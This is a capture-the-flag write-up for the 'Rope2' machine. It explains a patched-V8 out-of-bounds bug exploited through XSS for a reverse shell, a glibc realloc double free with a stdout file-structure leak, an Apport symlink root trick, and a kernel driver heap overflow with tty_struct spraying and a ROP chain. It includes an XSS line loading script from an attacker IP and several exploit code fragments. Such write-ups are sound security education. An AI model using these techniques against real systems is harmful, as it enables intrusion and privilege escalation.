Before I start, I would like to acknowledge Hexabeast, who worked with me on the v8 pwnable. I would also like to thank Sampriti and my teammate cfaeb1d for briefly discussing the user pwnable with me.

Initial enumeration is quite obvious. An nmap scan shows ports 22, 5000, and 8000 open. Port 5000 hosts a GitLab instance, and exploring around (http://rope2.htb:5000/explore/projects/starred), you can see Chromium source code with a patch by the challenge author. Use the GitLab website to download the source code at its current commit: http://ropetwo.htb:5000/root/v8/commit/7410f6809dd33e317f11f39ceaebaba9a88ea970

On port 8000, there is a website that allows us to submit a contact form. Since the GitLab makes it clear that this is a V8 pwnable, XSS would be an obvious vector. Testing something like <script src=http://10.10.14.9/exploit.js></script> showed a response on my local SimpleHTTPServer. Clearly, our path is to use the browser pwnable to write JavaScript code that gains RCE, which we can trigger via the XSS.

Finding the bug is extremely easy. Take a look at the changed files in the commit history. We notice that several files are changed, but the one that actually matters is builtin-arrays.cc. The other files were modified to properly introduce and incorporate the new functions added in builtin-arrays.cc.

In ArrayGetLastElement, it returns the value of the array at array[len], which is an OOB read. In ArraySetLastElement, it expects two arguments: the first argument will be the “this” argument and the second argument is the value, which the element at array[len] will be set to. This is an obvious OOB write. This seems quite similar to Faith's famous *CTF OOB writeup. One important thing to note here is that in December 2019, the V8 team introduced pointer compression to the V8 heap. Basically, it's a pretty smart memory-saving decision; rather than storing 64 bit pointers on the heap, most of the pointers are treated as 32 bit (with only the bottom half of the qword stored), while the upper 32 bits (also known as the isolate root) are stored in the r13 register.

As mentioned earlier, the other files were just modified to support the addition of this new function for builtin arrays in V8.


typer.cc and bootstrapper.cc tell us that we can access these functions on builtin arrays with GetLastElement and SetLastElement.

For some reason, only the compiled Chromium was provided. There was neither a d8 release nor a d8 debug binary. The repo was also missing certain Chromium build scripts; however, once everything is fixed correctly, the build instructions Faith provided regarding Chromium depot_tools, gclient, v8gen.py, and ninja should suffice for both release and debug. To avoid dependency hell, I ended up rolling out an 18.04 docker to deal with the compilation (check out a commit near the date of the gitlab commit before the vulnerable patch, and then add the patch back in; I know some of my other teammates also managed to build it by slowly fixing the missing dependencies).

Before I start, I highly recommend you to check out Faith's writeup or the famous Phrack paper, as those were the sources I relied heavily upon (my exploit is also very closely based upon Faith's). I'm still quite new to V8, so their explanations will probably be better, but the following is a summary of some important concepts I learned for personal notes.

In the V8 heap, there are three main value types: smis, pointers, and doubles. Doubles are 64 bits, pointers are compressed to 32 bits (and tagged), and smis are 32 bits as well (with their values doubled to differentiate them from pointers). There are also several important components to an object on the V8 heap (which you can see by running a debug d8 with the --allow-natives-syntax option). One should also note that Chromium uses a different allocator known as PartitionAlloc for most things, instead of glibc's allocator (which d8 uses).

For every V8 object, there are several important pieces of data. The map is the most important; it is a pointer to data that contains type information. According to Phrack, data such as the object size, element types, and prototype pointer is stored in the Map. V8 currently has 21 element kinds, but it mainly uses SMI_ELEMENTS, DOUBLE_ELEMENTS, and ELEMENTS (with each of them having the more efficient PACKED form and the more expensive HOLEY form). Another important piece of information is the elements (and properties) pointer, which points to a region that contains a pointer to another Map, a capacity size, and then the data/pointers indexed. Array objects also have an additional length field (lengths are represented as an smi).

Here is some sample output as an example for some of the terminology above (you can see how the fields are ordered from the debugging view as well):


Interesting to see how the double array's elements are usually above the object, which starts with the map field here... perhaps we can use the OOB to create some type confusion, as you will see later.

There are a few more important V8 exploitation concepts before we begin. In browser pwning, there are two basic primitives: addrof and fakeobj. Retrieving the address of an object is known as addrof. As Faith discusses, this can easily be done if you create a type confusion of an object array into a double array, so its elements, which are pointers, get output as doubles. The other main primitive is fakeobj, where, as the name implies, we fake objects in memory. As Faith discusses again, this can be achieved by creating the opposite type confusion of a double array into an object array, and writing pointers into the elements.

Using these two primitives, one can achieve arbitrary reads and writes. For arbitrary reads, we can make a double array where the first element contains a double array map, and then create a fake object over that field (making V8 think it's a double array). We can now manipulate the value that acts as the elements pointer to be a valid address, and have it read its contents from there by indexing into our fake object. Using this same concept, we can achieve an arbitrary write.

At this point, with all 4 of these primitives, we have enough to gain arbitrary code exec. Normally, Chromium runs under a sandbox that makes “arbitrary” not exactly true, but we don't have to worry about that here, as it is disabled. The standard way in V8 exploitation is to use WASM instances. When you initialize a WebAssembly instance, a new rwx page is mmap'd into V8 memory. Since this instance is also an object, you can leak its address. At the instance + 0x68, the rwx page address is stored in its 64 bit entirety, so you can use the arbitrary read to read it out. Then you can write your own shellcode into the rwx region. Calling your exported WebAssembly function will now execute that shellcode. One might wonder why such advanced software would be using an rwx page. Apparently, V8 devs pinpoint the issue on asm.js, which requires lazy compilation into WebAssembly, and the constant permission flips would impact performance a lot.

However, how can you write to 64 bit addresses outside of the V8 heap when there is pointer compression and you can't control the isolate root? Basically, an ArrayBuffer's backing store still stores the full 64 bit pointer, as it references a region outside the V8 heap (since the backing store is allocated by ArrayBuffer::Allocator), as you can see in the image below.


If you change the backing store, you can now write to that arbitrary 64 bit address (like your WASM instance's rwx page) with a DataView object initialized over your ArrayBuffer, since ArrayBuffers are low level raw binary buffers and only DataView (user specified types for values) or TypedArrays (uniform value access) can be used to interface with their contents. You could also perhaps find a stable way to leak a libc address, as they do exist in the V8 heap (and the V8 heap behaves predictably), and then choose to overwrite a hook function with another function or a stack pivot; do note that this would work better inside d8 (since it uses glibc's allocator) than Chromium (which primarily relies on PartitionAlloc, though I believe glibc's allocator is still occasionally utilized).

Anyways, after the crash course above, let's begin discussing this exploit. Due to pointer compression, the OOB won't be exactly as easy as the one from *CTF (OOB behavior for double arrays will still behave the same). Notice how in the patch, builtin arrays are forcefully typecast to 64 bit FixedDoubleArrays. If you have an array of objects, this forced typecasting groups 2 object pointers together as one double value each time while retaining the same original length (but it'll also be indexed as a double array). For example, if you have an object array of size 2, typecasting this into a FixedDoubleArray makes it a FixedDoubleArray of size 2, which is equivalent to an object array of size 4, so indexing won't behave the same. If your object array is of size n, the OOB will access index n of the FixedDoubleArray, which covers what would be object array indices 2n and 2n+1.

For example, if I declare a size 2 array of objects called temp, the following behavior occurs:

convertToHex(ftoi64(temp.GetLastElement())) outputs 0x40808cad9
Running temp.SetLastElement(itof(0x13371337n)) causes the following behavior:
While this won't allow for a direct map overwrite and type confusion, we just have to take a longer route around it. For addrof, you can start off by creating an object array of size 1, and an object array of size 2 (that contains your target objects). You should also grab some other double array's map, and the second array's elements pointer, with the OOB read. This way, when we perform an OOB write on the first object array, it will hit the real index (in terms of 32 bit compressed object pointers) of 3 from its starting index, which overwrites both its own properties and elements pointers. We can replace its elements pointer with the elements pointer of the second array, and just wipe out the properties pointer, since it won't matter much for arrays. Now, when we OOB write on the first array again, it will still see a size of 1 double (effectively 2 object pointers due to typecasting), but use the elements of the second array. Since an effective size of 2 object elements is the correct size for this size 2 object array, we will hit the second array's map and properties. Properties once again don't matter, and you can just replace the map with the double array map leaked from the OOB read. Now indexing into this second array will leak the target objects' addresses.

The same concept is applied to fakeobj. However, this time we aren't changing the map of the second, larger object array. Rather, we want to grab its map's value. Once we have that, we can OOB the float array as before and change its map to an object array's map, then retrieve fake objects. Here is my implementation:


Arbitrary read and write were already explained above. In this case, due to pointer compression, we need to set both a valid address for the elements as well as the size (just choose any valid smi greater than or equal to 1). I also subtracted another 0x8 from the address for the elements location, since pointer compression puts both the elements' map and size in one single qword. Properties once again don't really matter, but the double array OOB leak handled it for us regardless, so I just left it at that. As a setup for my WASM instance, I just used Faith's implementation; due to pointer compression again, you will need to adjust for the offset of the backing store pointer. Here is the implementation so far.


And then we just need to trigger a WASM rwx page allocation, overwrite its code, and then execute the exported function. For my shellcode, I just chose a generic shellstorm x86_64 Linux reverse shell shellcode.

Here is my final exploit (note that it isn't 100% reliable, probably due to some advanced garbage collector behavior or some other V8 internals that I don't understand):


Now we have popped a shell as the chrome user.

From a quick look at /etc/passwd, we know the user flag will be in r4j's home directory. Basic enumeration shows a suid binary from r4j called rshell. We can utilize this to escalate our privileges.

At this point in the release, only 3 players had popped a shell, and all of us were working towards user. This is when the A Team, per tradition, found an unintended route and took first blood. Between the time this box was submitted and its release, 19.04 went EOL and was not patched, making it vulnerable to CVE-2020-8831. Basically, Apport will use the existing /var/lock/apport directory and create the lock file with world writeable permissions. Since Apport is enabled by default in modern Ubuntu, we just need to run a binary that purposely crashes. I know that R4J and the A Team, for their example, crashed a binary named “fault” and then used the symlink to write a bash script into /etc/update-motd.d for privilege escalation (which will be run as root on the next ssh connection):


 Apparently several other boxes were vulnerable to the same bug... 

For the sake of debugging (and since this is usually fine for many offsets), I patchelf'd the binary with the correct linker and libc, and re-merged debugging symbols into the library so I can properly debug with pwndbg.

Reversing the binary comes up with the following pseudocode:


Note that there is NX, Full RELRO, Canary, and PIE, and the libc version is 2.29. Basically, there is a file struct that holds the filename as a char array and the contents via a pointer. You only have 2 file slots, and you cannot have two files with the same filename (adding, removing, and editing are all done by filename). One issue is that there doesn't seem to be a good way to leak purely through the heap (the ls option only shows filenames, and nothing prints out file contents). Adding is quite safe (no overflows, etc.). Deleting is also safe, as the content pointer is nulled out. Edit also seems safe at first glance, but we must consider the behavior of realloc(). According to the glibc source, realloc behaves as follows (__libc_realloc calls _int_realloc):


If the old chunk size is larger than or equal to the requested chunk size, the chunk stays at the same memory location and realloc will attempt to split it. If the remainder is large enough to be its own chunk, it gets set up properly to be freed. Nothing happens if you request a realloc() of the same size. In __libc_realloc, if the requested size is 0, it just frees the chunk and returns NULL (but that NULL is stored in a temporary value and, by the program's logic, won't replace the file content pointer).

If the old chunk size is smaller than the requested chunk size, it will first attempt to extend the current chunk into the top chunk. If it's not adjacent to the wilderness, it will also try to extend into the next free chunk if possible and then deal with the split of the remainder later (as in the case where the old chunk size is larger than or equal to the requested size). Its last resort is to just allocate, memcpy, and then free the old chunk. Note that _int_malloc is used in this case, and like calloc, the code path taken in that function will not allocate from tcache to my knowledge.

The program only checks that the size is less than or equal to 0x70. If we tell it to realloc to a size of 0, we can basically turn the edit into a free. Since the size check doesn't prevent this (and the pointer remains in place), we can use this to emulate a double free; this is the central bug.
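A tiny standalone demonstration of the primitive (my own toy, not the challenge binary):

#include <stdio.h>
#include <stdlib.h>

int main(void) {
    void *content = malloc(0x48);          /* the file content chunk      */
    void *ret     = realloc(content, 0);   /* glibc: equivalent to free() */
    printf("realloc(ptr, 0) returned %p\n", ret);   /* prints (nil)       */

    /* The challenge stores realloc's return in a temporary and keeps the
     * old pointer, so `content` still points at the freed chunk; a second
     * size-0 edit would free it again (a double free), and further edits
     * act as use-after-free writes.                                       */
    return 0;
}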

But how can we grab a leak? Well, when analyzing libc offsets, we notice that _IO_2_1_stdout_ and the main arena only differ in the last 2 bytes. We will always know the last 12 bits due to ASLR behavior, so there are only 4 bits we do not know. If we attack this file structure correctly, we can have every puts call print out large sections of libc itself at runtime. Therefore, with a 4 bit bruteforce (1/16 rate of success), we might be able to redirect a heap chunk to that file structure, modify it, and dump portions of runtime addresses.

This is actually a really common technique, as detailed in the HITCON baby tcache challenge. The linked writeup gives a much better explanation, but the gist is that puts calls _IO_new_file_xsputn, which will call _IO_new_file_overflow. Page 16 of the famous AngelBoy FSOP paper also discusses this technique.


Our end goal is to have this file structure code path end up at _IO_SYSWRITE in _IO_do_write. To hit _IO_do_write, we just need to skip the first two conditionals and have our ch argument be EOF. The second argument is already set correctly by the call from _IO_new_file_xsputn. To skip the first two conditions, we need to make sure to set the _IO_CURRENTLY_PUTTING flag and unset the _IO_NO_WRITES flag in the _flags field of the file structure. The following is _IO_do_write:


To hit _IO_SYSWRITE, we want to set the _IO_IS_APPENDING flag in the file structure's _flags field and make read_end different from write_base; this way, it won't take the lseek syscall path and return. Now, the _IO_SYSWRITE syscall writes (f->_IO_write_ptr - f->_IO_write_base) bytes starting from f->_IO_write_base.

To summarize, based on libio.h, we can set the flags as follows: (_IO_MAGIC | _IO_IS_APPENDING | _IO_CURRENTLY_PUTTING) & ~_IO_NO_WRITES. The value of the _flags field should be 0xfbad1800. The read field values won't really matter, so just set read_ptr, read_base, and read_end to NULL. Now, we can use a single byte to tamper with write_base, and hence have the syscall dump memory for us.
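As a hedged sketch of what the forged _IO_2_1_stdout_ should contain (offsets taken from the glibc 2.29 struct _IO_FILE layout; the exact leak window is up to you):

#include <stdint.h>
#include <string.h>

/* Fill buf (which will overlay _IO_2_1_stdout_) so the next puts dumps the
 * memory between write_base and write_ptr.                                  */
void build_fake_stdout(uint8_t *buf, uint64_t leak_start, uint64_t leak_end) {
    uint64_t flags = 0xfbad1800;        /* _IO_MAGIC | _IO_IS_APPENDING | _IO_CURRENTLY_PUTTING */
    memcpy(buf + 0x00, &flags, 8);
    memset(buf + 0x08, 0, 3 * 8);       /* _IO_read_ptr, _IO_read_end, _IO_read_base = NULL     */
    memcpy(buf + 0x20, &leak_start, 8); /* _IO_write_base: where the dump starts                */
    memcpy(buf + 0x28, &leak_end, 8);   /* _IO_write_ptr : where the dump ends                  */
}

/* In the actual exploit only the low byte of _IO_write_base is tampered with,
 * which is why a short partial overwrite through the redirected chunk suffices. */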

I will now discuss the exploit itself below. A really good understanding of glibc heap behavior is a must before reading. A lot of what I do is based on heap intuition and heap feng shui, as the 2 chunk limit makes this extremely tough (in fact, after you leak, you will see that you only have one chunk left to use if you don't want the program to crash).

The first thing I did was store some chunks in the 0x60 and 0x80 tcache bins for usage after the leak. This way, when I corrupt the unsorted bin, I can still get valid chunks back. I then allocated a 0x40 user-size tcache chunk, filled it with 0x71 (as fake size metadata for later; this same technique will be applied later on to beat the many size checks in glibc), and then freed it (note that in my code, fakeedit basically just performs the edit with size 0).


Here is the current heap state:

Then I started using the 0x70 tcache chunk; I used the realloc size of 0 to double free and fill the tcache (note that we must wipe the key entry of each chunk to bypass the 2.29 tcache double free mitigation). Then I started pulling back from the 0x60 user-size tcache, and changed the fd pointer to redirect me into the region at 0x......370 shown in the diagram above.



On my next allocation from the 0x70 tcache, I will still get the original location. Due to the original successive double frees, the two chunks will be at the same location. I then use realloc behavior to split the second chunk into a 0x50 and 0x20 real-size chunk (the 0x20 chunk will be sent into the tcache). I then fake edited the 0x50 chunk, split it into 0x20 and 0x30 sizes (with the 0x30 being sent into the tcache), and then freed the 0x20 size chunk. What's the purpose of this complex chain of events? It is for me to corrupt the tcache bins so that multiple different tcache freelists have pointers to the same memory location. At this point, my first file content also points to this 0x......370 location.



Remember now that our current file content (size 0x70) and the first items of the 0x20 and 0x50 tcache freelists all point to the same location. I then allocated a chunk (for the second filename) from the 0x70 tcache bin to change the size of the current file content at 0x......390 to 0x91 (so once we fill the 0x90 tcache, we can get unsorted chunks instead of fast chunks). Note that you have to continually change the key field in the “0x90” sized chunk to bypass the tcache double free mitigation, which I did from the chunk allocated above, as edit restricts us from going over a size of 0x70.



Now we can overlap tcache bins with unsorted bins so that, with a 1/16 brute force, a tcache bin can be used to write onto the _IO_2_1_stdout_ file structure. Here is where having tcache bins of different sizes point to the same location becomes useful. If we had just double freed the same chunk, then we couldn't exactly retrieve the redirected chunk, since you can allocate and modify fd for the first file content spot, and then you need two more allocations to get back the target location (and that wouldn't be possible with realloc, free, and only 2 spots). With my setup, I can use one of the tcache chunks (0x20) from one of the sizes to modify 2 bytes of the fd (with only the upper 4 bits being guessed), allocate once from the 0x50 chunk, then free the 0x20 chunk, and replace that spot with a 0x50 sized allocation, giving us control over the _IO_2_1_stdout_ file structure. Now, when puts runs again, we should get a massive dump of data. Note that from this point on, my addresses will be different, since I believe this technique is somewhat ASLR dependent, and using the non-ASLR addresses for the brute only worked locally. The code below will be the one adjusted for remote, while the image shows the original local one without ASLR.



However, as a consequence of this leaking mechanism, there is no good metadata for us to use for the size field, and subsequent frees on this chunk will fail. This means we only have one chunk left to obtain RCE.

Our end goal should be to redirect a chunk into __free_hook to pop a shell. How do we do this with only 1 chunk remaining? After a bit of cleanup, I pulled from the previously saved 0x80 chunk (as the unsorted bin is now corrupted). I then fake edited it, and split it into an active 0x20 chunk and a freed 0x60 chunk. I then freed this 0x20 chunk so I could get another allocation from the previously freed 0x80 chunk. Using this, I can change the fd of the 0x60 chunk to __free_hook - 8.



After this point, we can free our chunk once again to make room for a new allocation. I can get the location of __free_hook - 8 back by allocating from the 0x60 tcache once, splitting it, freeing it, and then allocating from it again. Then it's just a matter of overwriting it with /bin/sh\x00 and the address of system, and a subsequent free call will pop a shell.

Here is the final remote exploit:


Finally, we pop a shell as R4J (the remote 1/16 brute takes a few minutes):

However, we still weren't able to read the flag. It turns out our group permissions were wrong, as we were still in the chromeuser group, but this is trivial to fix: newgrp - r4j changes our gid correctly, and we can grab the user flag.

Due to the nature of the box, I was 99% sure root was going to be a kernel pwn. Running dmesg showed us the following messages:
[   20.879368] ralloc: loading out-of-tree module taints kernel.
[   20.879407] ralloc: module verification failed: signature and/or required key missing - tainting kernel

This is probably the vulnerable driver. Looking in /dev, there was a ralloc device loaded, and the driver itself was located at /lib/modules/5.0.0-38-generic/kernel/drivers/ralloc/ralloc.ko. We can transfer that out and begin reversing. One thing to note is the set of protections in play. From /proc/cpuinfo, we know SMEP is enabled, but surprisingly, R4J was very nice and left KPTI and SMAP disabled (although KPTI was originally enabled during testing; perhaps HackTheBox was running their servers on AMD Epyc, where Meltdown, the issue KPTI was designed to address, isn't a problem). KASLR will obviously be enabled, but check /proc/cmdline to be absolutely sure.

Reversing the kernel module comes up with the following pseudocode:


The bug is pretty clear here. When allocating through the ralloc ioctl, the size recorded in the global array for each entry is the requested size plus 0x20, while the underlying allocation only gets the requested size. Since edit operates on the recorded size, you get a kernel heap overflow of 0x20 bytes past the allocation (and read gives a matching out-of-bounds read, which will come in handy later); delete and read otherwise contain no additional bugs.
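
Roughly, the relevant ioctl handlers behave like the pseudocode below (a reconstruction; the command names, struct layout, and variable names are mine, not the driver's real symbols):

case RALLOC_ADD:
    entries[req.idx].ptr  = kmalloc(req.size, GFP_KERNEL);
    entries[req.idx].size = req.size + 0x20;   /* BUG: bookkeeping adds 0x20 */
    break;
case RALLOC_EDIT:
    copy_from_user(entries[req.idx].ptr, req.data, entries[req.idx].size);  /* 0x20-byte OOB write */
    break;
case RALLOC_READ:
    copy_to_user(req.data, entries[req.idx].ptr, entries[req.idx].size);    /* matching OOB read */
    break;
case RALLOC_DELETE:
    kfree(entries[req.idx].ptr);               /* no additional bug here */
    break;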

In order to debug this pwn efficiently, I had to use qemu so I could integrate it with peda remote debugging. I also enabled KVM so I wouldn't be stuck waiting five minutes for it to even boot. To set this up, I downloaded the Ubuntu Server 19.04 image and made sure the kernel version matched (5.0.0-38 from enumeration). I then created a disk image specifically for the install with the following commands:

qemu-img create -f qcow2 ralloc.qcow2 6G
qemu-system-x86_64 -hda ralloc.qcow2 -boot d -cdrom ./19.04.iso -m 2048 -nographic -enable-kvm

Then, to boot this kernel, I had to set the following flags:
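
Something along these lines works for booting it afterwards (the exact flags I used may differ slightly; -s exposes a gdb stub on port 1234 for peda, and -cpu host keeps SMEP available under KVM):

qemu-system-x86_64 -hda ralloc.qcow2 -m 2048 -enable-kvm -cpu host -nographic -s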


I also added “console=ttyS0 loglevel=3 oops=panic panic=1 kaslr” to /etc/default/grub, ran update-grub, placed ralloc.ko into “/lib/modules/`uname -r`/kernel/drivers/ralloc”, ran depmod, and then rebooted. We should now have a proper qemu debugging environment to hook peda onto. It is also helpful to retrieve the System.map file as well as vmlinuz.

With the size limitations above, the tty_struct from the kmalloc-1024 slab is perfect for this purpose; it gives both a KASLR leak via ptm_unix98_ops and rip control through its pointer to the tty_operations struct, from which we can control the ioctl function pointer. Before discussing the exploit, I would like to briefly go over some protections found in standard Linux distro kernels (which are often compiled out for CTF kernel challenges). As this post from infosectbr mentions, freelist pointers are hardened in the following manner: ((unsigned long)ptr ^ s->random ^ ptr_addr). If we can get a heap leak, we can still perform freelist poisoning. Even without a heap leak, there is a chance to corrupt the pointer with only an 8-byte overflow and have it redirect somewhere useful (as the article mentions), but a heap spray is necessary. It's just easier to rely on useful kernel structures (plus, even more pointer hardening options were added in later kernel versions). Another hardening option is freelist randomization, which, as the name implies, randomizes the order of the freelist. This means our heap operations won't be as predictable as in glibc, so a heap spray will be necessary.
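
For reference, the obfuscation lives in mm/slub.c and looks roughly like this as of 5.0:

static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
                                 unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
    /* the stored next pointer is xored with a per-cache secret and its own address */
    return (void *)((unsigned long)ptr ^ s->random ^ ptr_addr);
#else
    return ptr;
#endif
}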

One of the first things in my kernel exploit is the set of helper functions and structs. I made the following:
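
The helpers are essentially thin wrappers around the driver's ioctl interface, roughly like the sketch below (the command numbers and request struct here are placeholders, not the values recovered from reversing):

#include <sys/ioctl.h>
#include <fcntl.h>
#include <unistd.h>

#define RALLOC_ADD    0x1000   /* placeholder ioctl numbers */
#define RALLOC_EDIT   0x1001
#define RALLOC_READ   0x1002
#define RALLOC_DELETE 0x1003

struct ralloc_req {
    unsigned long idx;
    unsigned long size;
    char *data;
};

int ralloc_fd;   /* open("/dev/ralloc", O_RDWR) at startup */

void ralloc_add(unsigned long idx, unsigned long size) {
    struct ralloc_req req = { .idx = idx, .size = size };
    ioctl(ralloc_fd, RALLOC_ADD, &req);
}

void ralloc_read(unsigned long idx, char *buf) {
    struct ralloc_req req = { .idx = idx, .data = buf };
    ioctl(ralloc_fd, RALLOC_READ, &req);
}

void ralloc_edit(unsigned long idx, char *buf) {
    struct ralloc_req req = { .idx = idx, .data = buf };
    ioctl(ralloc_fd, RALLOC_EDIT, &req);
}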


As mentioned earlier, we will be relying on the tty_struct structure, which gets allocated whenever we open /dev/ptmx. According to the source, the struct looks like the following:
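
Trimmed down to the fields we care about, the 5.0 definition begins roughly like this:

struct tty_struct {
    int magic;
    struct kref kref;                  /* magic and kref pack into the first qword */
    struct device *dev;
    struct tty_driver *driver;
    const struct tty_operations *ops;  /* 4th qword: the pointer we leak and hijack */
    int index;
    /* ... */
};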


Therefore, the 4th qword of this struct holds the tty_operations pointer, which for ptmx devices will contain the address of ptm_unix98_ops. According to the Ubuntu System.map file, that address has 0x6a0 as its lower 12 bits; this will come in handy for the heap spray. From the source, the following is the tty_operations struct:
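
Again trimmed to the first dozen or so members (from include/linux/tty_driver.h in 5.0):

struct tty_operations {
    struct tty_struct * (*lookup)(struct tty_driver *driver,
                                  struct file *filp, int idx);
    int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
    int  (*open)(struct tty_struct *tty, struct file *filp);
    void (*close)(struct tty_struct *tty, struct file *filp);
    void (*shutdown)(struct tty_struct *tty);
    void (*cleanup)(struct tty_struct *tty);
    int  (*write)(struct tty_struct *tty, const unsigned char *buf, int count);
    int  (*put_char)(struct tty_struct *tty, unsigned char ch);
    void (*flush_chars)(struct tty_struct *tty);
    int  (*write_room)(struct tty_struct *tty);
    int  (*chars_in_buffer)(struct tty_struct *tty);
    int  (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);  /* offset 0x60 */
    /* ... */
};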


Hijacking the ioctl function pointer seems like a good idea, as it would trigger when we run ioctl with that fd. 

For the spray, my plan was to allocate a bunch of ptmx devices and then loop through the driver's 32 slots, allocating a ralloc chunk in each. After each allocation, I check whether it is adjacent to a ptmx device by performing an OOB read and looking for a ptm_unix98_ops address (we have just enough of an OOB read to hit that field of the structure). If it is the right one, I return that index. Here is my implementation:
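
Reusing the placeholder wrappers from earlier, the spray looks roughly like this (assuming a request size of 0x400 so the chunk lands in kmalloc-1024 next to the tty_structs):

#define SPRAY_PTMX 200
int ptmx_fds[SPRAY_PTMX];

int find_adjacent(void) {
    /* fill kmalloc-1024 with tty_structs first */
    for (int i = 0; i < SPRAY_PTMX; i++)
        ptmx_fds[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);

    static unsigned long buf[(0x400 + 0x20) / 8];
    for (int idx = 0; idx < 32; idx++) {
        ralloc_add(idx, 0x400);           /* kmalloc-1024 chunk, recorded size 0x420 */
        ralloc_read(idx, (char *)buf);    /* the last 0x20 bytes spill into the neighbour */
        /* ops sits at offset 0x18 of tty_struct, and ptm_unix98_ops ends in 0x6a0 */
        if ((buf[(0x400 + 0x18) / 8] & 0xfff) == 0x6a0)
            return idx;                   /* this chunk sits directly below a tty_struct */
    }
    return -1;
}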


From there, we can rebase all the kernel addresses we need for privilege escalation to uid 0.


Now we can use the OOB write to replace the tty_operations struct pointer with our own malicious pointer. Take care to preserve the other addresses in this struct. I also filled my malicious tty_operations struct with the address of pty_close to prevent other crashes (it just fills the table with valid kernel pointers, and crashes aren't really a concern since ioctl is the only operation I plan to use). I chose a stack pivot gadget of xchg eax, esp, since the address of the function pointer will be in the rax register when I trigger the malicious ioctl; the xchg truncates it to 32 bits, giving me a fixed absolute location where I can place my fake stack for the rop chain.
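
In rough C, the fake table ends up like this (PTY_CLOSE_OFF and XCHG_EAX_ESP_OFF are placeholder offset constants standing in for the values pulled from System.map and the gadget search):

unsigned long fake_ops[0x20];

void build_fake_ops(unsigned long kbase) {
    for (int i = 0; i < 0x20; i++)
        fake_ops[i] = kbase + PTY_CLOSE_OFF;   /* harmless, valid kernel pointers */
    fake_ops[12] = kbase + XCHG_EAX_ESP_OFF;   /* .ioctl -> xchg eax, esp ; ret */
    /* after the xchg, rsp is the lower 32 bits of rax (the address of the hijacked
       function pointer), so the fake stack / rop chain gets mmap'ed at that truncated
       address before triggering */
}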


Here is what the corruption looks like in memory (first address is the location of the length 32 array in the driver):

As you can see, there is a userland pointer that replaced the tty_operations struct pointer.

Now what should my rop chain look like? Only SMEP is enabled, so this should be quite trivial, whether by flipping SMEP off in cr4 and going ret2usr or by staying in a pure rop chain (with no SMAP, the chain and fake stack can live in userland memory). However, the one issue I kept running into was the inability to use certain syscalls after returning to usermode (such as execve), and I do not enjoy having an exploit that can't pop a shell. For some reason, execve with either the iretq, sysretq, or other syscall trampolines would cause a kernel panic; maybe there was some corruption from the exploit I didn't clean up, but I am not completely sure. In the end, I decided to have my exploit make /usr/bin/dash a suid binary owned by root and then hang the kernel thread (for 49.7 days, roughly 2^32 milliseconds, which is long enough). The idea was to run the following pseudocode:
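
In rough pseudocode (the names below stand in for the kernel routines the actual chain calls):

commit_creds(prepare_kernel_cred(0));   /* become root in this kernel thread */
chmod("/usr/bin/dash", 04755);          /* conceptually: mark dash setuid-root */
sleep_forever();                        /* hang instead of returning to usermode */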


Once the rop chain is written to the target location for the stack pivot, we can trigger it and become root. While we don't know which ptmx fd owns the adjacent chunk, we can simply loop through all of them and run ioctl on each. Note that this exploit has to be backgrounded in bash due to the hang.
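
Since any of the sprayed fds might own the neighbouring tty_struct, the trigger is just a loop like this (the cmd value is arbitrary; unrecognized commands fall through to the hijacked ->ioctl):

for (int i = 0; i < SPRAY_PTMX; i++)
    ioctl(ptmx_fds[i], 0xcafebabe, 0);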

The following is the final exploit:


And after compiling and transferring to remote... (note that you can access this driver as chromeuser as well):


Whew, and finally, we can obtain the root flag! It was a really fun journey, and it definitely sparked my interest in learning more about kernel pwning (my previous experience only involved solving kernel ROP challenges) and browser pwnables. Feel free to let me know if anything I explained is wrong or confusing (this is quite a complex writeup), and I am 100% looking forward to Rope3.

Acknowledgements: In addition to all the sources linked above, I would like to thank R4J, Faith, D3v17, and Overthink for giving this a read through and providing feedback to make the writeup even better.